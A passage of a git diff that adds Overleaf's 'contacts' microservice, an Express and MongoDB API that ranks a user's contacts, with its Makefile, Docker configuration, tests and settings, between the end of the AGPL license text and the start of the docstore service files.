+ + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/contacts/Makefile b/services/contacts/Makefile new file mode 100644 index 0000000..97a348d --- /dev/null +++ b/services/contacts/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = contacts +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/contacts/README.md b/services/contacts/README.md new file mode 100644 index 0000000..5d84152 --- /dev/null +++ b/services/contacts/README.md @@ -0,0 +1,11 @@ +overleaf/contacts +=================== + +An API for tracking contacts of a user + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2015-2019. 
diff --git a/services/contacts/app.js b/services/contacts/app.js new file mode 100644 index 0000000..0d22ff3 --- /dev/null +++ b/services/contacts/app.js @@ -0,0 +1,24 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import { mongoClient } from './app/js/mongodb.js' +import { app } from './app/js/server.js' + +const { host, port } = Settings.internal.contacts + +try { + await mongoClient.connect() +} catch (err) { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) +} + +app.listen(port, host, err => { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`contacts starting up, listening on ${host}:${port}`) +}) diff --git a/services/contacts/app/js/ContactManager.js b/services/contacts/app/js/ContactManager.js new file mode 100644 index 0000000..574a18a --- /dev/null +++ b/services/contacts/app/js/ContactManager.js @@ -0,0 +1,24 @@ +import { db, ObjectId } from './mongodb.js' + +export async function touchContact(userId, contactId) { + await db.contacts.updateOne( + { user_id: new ObjectId(userId.toString()) }, + { + $inc: { + [`contacts.${contactId}.n`]: 1, + }, + $set: { + [`contacts.${contactId}.ts`]: new Date(), + }, + }, + { upsert: true } + ) +} + +export async function getContacts(userId) { + const user = await db.contacts.findOne({ + user_id: new ObjectId(userId.toString()), + }) + + return user?.contacts +} diff --git a/services/contacts/app/js/Errors.js b/services/contacts/app/js/Errors.js new file mode 100644 index 0000000..931579b --- /dev/null +++ b/services/contacts/app/js/Errors.js @@ -0,0 +1,6 @@ +export class NotFoundError extends Error { + constructor(message) { + super(message) + this.name = 'NotFoundError' + } +} diff --git a/services/contacts/app/js/HttpController.js b/services/contacts/app/js/HttpController.js new file mode 100644 index 0000000..27bbdbb --- /dev/null +++ b/services/contacts/app/js/HttpController.js @@ -0,0 +1,48 @@ +import logger from '@overleaf/logger' +import * as ContactManager from './ContactManager.js' +import { buildContactIds } from './contacts.js' + +const CONTACT_LIMIT = 50 + +export function addContact(req, res, next) { + const { user_id: userId } = req.params + const { contact_id: contactId } = req.body + + if (contactId == null || contactId === '') { + res.status(400).send('contact_id should be a non-blank string') + return + } + + logger.debug({ userId, contactId }, 'adding contact') + + Promise.all([ + ContactManager.touchContact(userId, contactId), + ContactManager.touchContact(contactId, userId), + ]) + .then(() => { + res.sendStatus(204) + }) + .catch(error => { + next(error) + }) +} + +export function getContacts(req, res, next) { + const { user_id: userId } = req.params + const { limit } = req.query + + const contactLimit = + limit == null ? 
CONTACT_LIMIT : Math.min(parseInt(limit, 10), CONTACT_LIMIT) + + logger.debug({ userId }, 'getting contacts') + + ContactManager.getContacts(userId) + .then(contacts => { + res.json({ + contact_ids: buildContactIds(contacts, contactLimit), + }) + }) + .catch(error => { + next(error) + }) +} diff --git a/services/contacts/app/js/contacts.js b/services/contacts/app/js/contacts.js new file mode 100644 index 0000000..36a142c --- /dev/null +++ b/services/contacts/app/js/contacts.js @@ -0,0 +1,13 @@ +export function buildContactIds(contacts, limit) { + return Object.entries(contacts || {}) + .map(([id, { n, ts }]) => ({ id, n, ts })) + .sort(sortContacts) + .slice(0, limit) + .map(contact => contact.id) +} + +// sort by decreasing count, decreasing timestamp. +// i.e. highest count, most recent first. +function sortContacts(a, b) { + return a.n === b.n ? b.ts - a.ts : b.n - a.n +} diff --git a/services/contacts/app/js/mongodb.js b/services/contacts/app/js/mongodb.js new file mode 100644 index 0000000..d3d161a --- /dev/null +++ b/services/contacts/app/js/mongodb.js @@ -0,0 +1,17 @@ +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import { MongoClient } from 'mongodb' + +export { ObjectId } from 'mongodb' + +export const mongoClient = new MongoClient( + Settings.mongo.url, + Settings.mongo.options +) +const mongoDb = mongoClient.db() + +export const db = { + contacts: mongoDb.collection('contacts'), +} + +Metrics.mongodb.monitor(mongoClient) diff --git a/services/contacts/app/js/server.js b/services/contacts/app/js/server.js new file mode 100644 index 0000000..7d4cc88 --- /dev/null +++ b/services/contacts/app/js/server.js @@ -0,0 +1,32 @@ +import * as Metrics from '@overleaf/metrics' +import logger from '@overleaf/logger' +import express from 'express' +import bodyParser from 'body-parser' +import * as HttpController from './HttpController.js' +import * as Errors from './Errors.js' + +logger.initialize('contacts') +Metrics.event_loop?.monitor(logger) +Metrics.open_sockets.monitor() + +export const app = express() +app.use(Metrics.http.monitor(logger)) +Metrics.injectMetricsRoute(app) + +app.get('/user/:user_id/contacts', HttpController.getContacts) +app.post( + '/user/:user_id/contacts', + bodyParser.json({ limit: '2mb' }), + HttpController.addContact +) + +app.get('/status', (req, res) => res.send('contacts is alive')) + +app.use(function (error, req, res, next) { + logger.error({ err: error }, 'request errored') + if (error instanceof Errors.NotFoundError) { + return res.sendStatus(404) + } else { + return res.status(500).send('Oops, something went wrong') + } +}) diff --git a/services/contacts/buildscript.txt b/services/contacts/buildscript.txt new file mode 100644 index 0000000..8563d1b --- /dev/null +++ b/services/contacts/buildscript.txt @@ -0,0 +1,9 @@ +contacts +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/contacts/config/settings.defaults.cjs b/services/contacts/config/settings.defaults.cjs new file mode 100644 index 0000000..7ffdb83 --- /dev/null +++ b/services/contacts/config/settings.defaults.cjs @@ -0,0 +1,24 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.maxSockets = 300 +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + contacts: { + port: 3036, + host: 
process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/contacts/docker-compose.ci.yml b/services/contacts/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/contacts/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/contacts/docker-compose.yml b/services/contacts/docker-compose.yml new file mode 100644 index 0000000..310220b --- /dev/null +++ b/services/contacts/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/contacts + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/contacts + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/contacts + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/contacts + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + diff --git a/services/contacts/package.json b/services/contacts/package.json new file mode 100644 index 0000000..f81f947 --- /dev/null +++ b/services/contacts/package.json @@ -0,0 +1,41 @@ +{ + "name": "@overleaf/contacts", + "description": "An API for tracking contacts of a user", + "private": true, + "type": "module", + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "mongodb": "6.12.0", + "request": "~2.88.2", + "underscore": "~1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/services/contacts/test/acceptance/js/GettingContactsTests.js b/services/contacts/test/acceptance/js/GettingContactsTests.js new file mode 100644 index 0000000..769f7ce --- /dev/null +++ b/services/contacts/test/acceptance/js/GettingContactsTests.js @@ -0,0 +1,121 @@ +import { ObjectId } from 'mongodb' +import request from 'request' +import async from 'async' +import { app } from '../../../app/js/server.js' + +const HOST = 'http://127.0.0.1:3036' + +describe('Getting Contacts', function () { + before(function (done) { + this.server = app.listen(3036, '127.0.0.1', error => { + if (error != null) { + throw error + } + + done() + }) + }) + + after(function () { + this.server.close() + }) + + describe('with no contacts', function () { + beforeEach(function () { + this.user_id = new ObjectId().toString() + }) + + it('should return an empty array', function (done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([]) + done() + } + ) + }) + }) + + describe('with contacts', function () { + beforeEach(function (done) { + this.user_id = new ObjectId().toString() + this.contact_id_1 = new ObjectId().toString() + this.contact_id_2 = new ObjectId().toString() + this.contact_id_3 = new ObjectId().toString() + + const touchContact = (userId, contactId, cb) => + request( + { + method: 'POST', + url: `${HOST}/user/${userId}/contacts`, + json: { + contact_id: contactId, + }, + }, + cb + ) + + async.series( + [ + // 2 is preferred since touched twice, then 3 since most recent, then 1 + cb => touchContact(this.user_id, this.contact_id_1, cb), + cb => touchContact(this.user_id, this.contact_id_2, cb), + cb => touchContact(this.user_id, this.contact_id_2, cb), + cb => touchContact(this.user_id, this.contact_id_3, cb), + ], + done + ) + }) + + it('should return a sorted list of contacts', function 
(done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([ + this.contact_id_2, + this.contact_id_3, + this.contact_id_1, + ]) + done() + } + ) + }) + + it('should respect a limit and only return top X contacts', function (done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts?limit=2`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([ + this.contact_id_2, + this.contact_id_3, + ]) + done() + } + ) + }) + }) +}) diff --git a/services/contacts/test/setup.js b/services/contacts/test/setup.js new file mode 100644 index 0000000..023fbc1 --- /dev/null +++ b/services/contacts/test/setup.js @@ -0,0 +1,11 @@ +import chai from 'chai' +import chaiAsPromised from 'chai-as-promised' +import sinonChai from 'sinon-chai' +import { ObjectId } from 'mongodb' + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +chai.should() +chai.use(chaiAsPromised) +chai.use(sinonChai) diff --git a/services/contacts/test/unit/js/ContactsManagerTests.js b/services/contacts/test/unit/js/ContactsManagerTests.js new file mode 100644 index 0000000..f5f5ae5 --- /dev/null +++ b/services/contacts/test/unit/js/ContactsManagerTests.js @@ -0,0 +1,98 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import esmock from 'esmock' +import { ObjectId } from 'mongodb' + +describe('ContactManager', function () { + beforeEach(async function () { + this.clock = sinon.useFakeTimers(new Date()) + + this.db = { contacts: {} } + + this.ContactManager = await esmock('../../../app/js/ContactManager', { + '../../../app/js/mongodb': { + db: this.db, + ObjectId, + }, + }) + + this.user_id = new ObjectId().toString() + this.contact_id = new ObjectId().toString() + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('touchContact', function () { + beforeEach(function () { + this.db.contacts.updateOne = sinon.stub().resolves() + }) + + describe('with a valid user_id', function () { + it('should increment the contact count and timestamp', async function () { + await expect( + this.ContactManager.touchContact(this.user_id, 'mock_contact') + ).not.to.be.rejected + + expect(this.db.contacts.updateOne).to.be.calledWith( + { + user_id: sinon.match(o => o.toString() === this.user_id), + }, + { + $inc: { + 'contacts.mock_contact.n': 1, + }, + $set: { + 'contacts.mock_contact.ts': new Date(), + }, + }, + { + upsert: true, + } + ) + }) + }) + + describe('with an invalid user id', function () { + it('should be rejected', async function () { + await expect( + this.ContactManager.touchContact( + 'not-valid-object-id', + this.contact_id + ) + ).to.be.rejectedWith( + 'input must be a 24 character hex string, 12 byte Uint8Array, or an integer' + ) + }) + }) + }) + + describe('getContacts', function () { + beforeEach(function () { + this.user = { + contacts: ['mock', 'contacts'], + } + this.db.contacts.findOne = sinon.stub().resolves(this.user) + }) + + describe('with a valid user_id', function () { + it("should find the user's contacts", async function () { + await expect( + this.ContactManager.getContacts(this.user_id) + ).to.eventually.deep.equal(this.user.contacts) + + expect(this.db.contacts.findOne).to.be.calledWith({ + 
user_id: sinon.match(o => o.toString() === this.user_id), + }) + }) + }) + + describe('with an invalid user id', function () { + it('should be rejected', async function () { + await expect(this.ContactManager.getContacts('not-valid-object-id')).to + .be.rejected + }) + }) + }) +}) diff --git a/services/contacts/test/unit/js/HttpControllerTests.js b/services/contacts/test/unit/js/HttpControllerTests.js new file mode 100644 index 0000000..3a7bc15 --- /dev/null +++ b/services/contacts/test/unit/js/HttpControllerTests.js @@ -0,0 +1,127 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import esmock from 'esmock' + +describe('HttpController', function () { + beforeEach(async function () { + const now = Date.now() + + this.contacts = { + 'user-id-1': { n: 2, ts: new Date(now) }, + 'user-id-2': { n: 4, ts: new Date(now) }, + 'user-id-3': { n: 2, ts: new Date(now - 1000) }, + } + + this.ContactManager = { + touchContact: sinon.stub().resolves(), + getContacts: sinon.stub().resolves(this.contacts), + } + + this.HttpController = await esmock('../../../app/js/HttpController', { + '../../../app/js/ContactManager': this.ContactManager, + }) + + this.user_id = 'mock-user-id' + this.contact_id = 'mock-contact-id' + + this.req = {} + this.res = {} + this.res.status = sinon.stub().returns(this.res) + this.res.end = sinon.stub() + this.res.json = sinon.stub() + this.res.send = sinon.stub() + this.res.sendStatus = sinon.stub() + this.next = sinon.stub() + }) + + describe('addContact', function () { + describe('with a valid user_id and contact_id', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.body = { contact_id: this.contact_id } + await this.HttpController.addContact(this.req, this.res, this.next) + }) + + it("should update the contact in the user's contact list", function () { + expect(this.ContactManager.touchContact).to.be.calledWith( + this.user_id, + this.contact_id + ) + }) + + it("should update the user in the contact's contact list", function () { + expect(this.ContactManager.touchContact).to.be.calledWith( + this.contact_id, + this.user_id + ) + }) + + it('should send back a 204 status', function () { + expect(this.res.sendStatus).to.be.calledWith(204) + }) + }) + + describe('with an invalid contact id', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.body = { contact_id: '' } + await this.HttpController.addContact(this.req, this.res, this.next) + }) + + it('should return 400, Bad Request', function () { + expect(this.res.status).to.be.calledWith(400) + expect(this.res.send).to.be.calledWith( + 'contact_id should be a non-blank string' + ) + }) + }) + }) + + describe('getContacts', function () { + describe('normally', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.query = {} + await this.HttpController.getContacts(this.req, this.res, this.next) + }) + + it('should look up the contacts in mongo', function () { + expect(this.ContactManager.getContacts).to.be.calledWith(this.user_id) + }) + + it('should return a sorted list of contacts by count and timestamp', function () { + expect(this.res.json).to.be.calledWith({ + contact_ids: ['user-id-2', 'user-id-1', 'user-id-3'], + }) + }) + }) + + describe('with more contacts than the limit', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.query = { limit: 2 } + await this.HttpController.getContacts(this.req, this.res, 
this.next) + }) + + it('should return the most commonly used contacts up to the limit', function () { + expect(this.res.json).to.be.calledWith({ + contact_ids: ['user-id-2', 'user-id-1'], + }) + }) + }) + + describe('without a contact list', function () { + beforeEach(async function () { + this.ContactManager.getContacts.resolves(null) + + this.req.params = {} + this.req.query = {} + await this.HttpController.getContacts(this.req, this.res, this.next) + }) + + it('should return an empty list', function () { + expect(this.res.json).to.be.calledWith({ contact_ids: [] }) + }) + }) + }) +}) diff --git a/services/contacts/tsconfig.json b/services/contacts/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/contacts/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/docstore/.gitignore b/services/docstore/.gitignore new file mode 100644 index 0000000..84bf300 --- /dev/null +++ b/services/docstore/.gitignore @@ -0,0 +1,8 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc + +# Jetbrains IDEs +.idea diff --git a/services/docstore/.mocharc.json b/services/docstore/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/docstore/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/docstore/.nvmrc b/services/docstore/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/docstore/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/docstore/Dockerfile b/services/docstore/Dockerfile new file mode 100644 index 0000000..60a024e --- /dev/null +++ b/services/docstore/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/docstore + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/docstore/package.json /overleaf/services/docstore/ 